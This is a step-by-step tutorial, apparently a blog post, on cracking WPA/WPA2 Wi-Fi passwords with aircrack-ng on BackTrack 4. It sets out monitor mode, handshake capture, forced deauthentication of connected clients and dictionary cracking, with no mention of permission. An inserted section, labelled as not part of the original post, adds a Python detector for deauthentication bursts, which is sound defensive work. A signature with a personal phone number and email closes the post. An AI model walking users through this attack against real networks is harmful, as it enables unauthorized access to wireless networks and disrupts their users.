Alright, let's start with what we need to complete this task:
1. Backtrack 4 live CD/USB or installation;
2. Willing to read all this :)
The first you can download for free from here:
http://www.backtrack-linux.org/downloads/.
Username to enter backtrack: root
Password: toor
Type startx and hit the ENTER key to start the BT4 graphical desktop.
We need three terminals open, and let's start:
1. airmon-ng stop wlan0 (This command stops the wifi adaptor)
2. airmon-ng start wlan0 (This command starts the wifi adaptor in monitoring mode)
3. airodump-ng wlan0 (This command is used only to pick the network for the test, by signal strength, channel, BSSID, ESSID. The command is stopped with CTRL+C; we are looking for a WPA or WPA2 network)
4. airodump-ng --channel (channel number) --bssid (MAC address of the network) -w (file name under which the captured information is saved) wlan0 (Leave this running and open a new terminal)
Here it is a good idea to mention that there are two ways to get the handshake: one is to wait for a client to authenticate to the AP (access point), the other is to deauthenticate an already connected client and force him to reauthenticate, so we capture the handshake packets. Ok, I will assume we were lucky and we got the authentication handshake; then in the top right part of the console we can see "WPA handshake: 00:14:6C:7E:40:80", where 00:14:6C:7E:40:80 is the MAC address of the access point.
So far so good, but what if we don't get any authentication handshake? Well, we can force our luck by deauthenticating an already connected client and making him reauthenticate, so we can get our handshake packets:
5. aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0
where -0 sends deauthentication frames, 1 is the number of deauthentications to be sent, -a is the MAC address of the AP, -c is the MAC address of the client. Important here is to keep in mind the signal strength and the distance between you and the client!
6. aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 *.cap Before running the aircrack-ng command we need to stop step 4 with Ctrl+C, and keep in mind that *.cap is the capture file whose name we chose with the -w parameter in step 4.
-w password.lst is the small dictionary list that comes with aircrack-ng; this dictionary list is optional, you can use your own or download one from the internet.
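From the defender's side, the deauthentication burst in step 5 is the part of this procedure that is visible on the air: a handful of deauth frames "from" the AP's own address inside a few seconds is not how clients normally leave. The following detector is an added example, not part of the original post; it parses the 24-byte 802.11 header of captured management frames and flags source/BSSID pairs that exceed a deauth rate. The sample capture is constructed inline with the two MAC addresses from the post, and the window and threshold values are assumptions to tune per network.

```python
import struct
from collections import defaultdict, deque

AP = "00:14:6c:7e:40:80"      # access point address from the post
CLIENT = "00:0f:b5:fd:fb:c2"  # client address from the post
DEAUTH_SUBTYPE = 12           # 802.11 management frame subtype 0xC

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))

def build_mgmt_frame(subtype, dst, src, bssid, seq, body=b""):
    """Constructed sample 802.11 management frame (no radiotap header), for testing only."""
    fc = subtype << 4  # type bits 2-3 = 0 (management), subtype in bits 4-7
    return (struct.pack("<HH", fc, 0) + mac_bytes(dst) + mac_bytes(src)
            + mac_bytes(bssid) + struct.pack("<H", seq << 4) + body)

def parse_80211_header(frame):
    """Return (type, subtype, addr1, addr2, addr3), or None if shorter than a 24-byte header."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    return ((fc >> 2) & 0x3, (fc >> 4) & 0xF,
            frame[4:10].hex(":"), frame[10:16].hex(":"), frame[16:22].hex(":"))

def detect_deauth_bursts(frames, window_s=10.0, threshold=5):
    """Flag (transmitter, bssid) pairs that send more than `threshold` deauth frames
    inside any `window_s`-second window. `frames` is an iterable of (timestamp, raw bytes).
    Injected deauths spoof the AP's address, so a burst 'from' the AP is itself the signal."""
    recent = defaultdict(deque)
    alerts = set()
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        hdr = parse_80211_header(raw)
        if hdr is None or hdr[0] != 0 or hdr[1] != DEAUTH_SUBTYPE:
            continue  # not a deauthentication frame
        key = (hdr[3], hdr[4])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            alerts.add(key)
    return alerts

# Constructed capture: one legitimate deauth (client leaving, reason 3), a beacon, then a burst.
SAMPLE_FRAMES = [(0.0, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, 1, struct.pack("<H", 3))),
                 (100.0, build_mgmt_frame(8, "ff:ff:ff:ff:ff:ff", AP, AP, 2))]
SAMPLE_FRAMES += [(100.1 + 0.1 * i, build_mgmt_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, 10 + i,
                                                    struct.pack("<H", 3))) for i in range(8)]

if __name__ == "__main__":
    print(detect_deauth_bursts(SAMPLE_FRAMES))  # {('00:14:6c:7e:40:80', '00:14:6c:7e:40:80')}
```

On a real network the frames would come from a monitor-mode capture, and the single legitimate deauth at t=0 stays below the threshold while the burst is reported.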
Enjoy!
Best regards,
Stoyan Bukovich
Executive manager
SNB Solutions
Cell.: +52 6241 616969
E-mail: s.bucovich@snb-bg.com
Web: www.snb-bg.com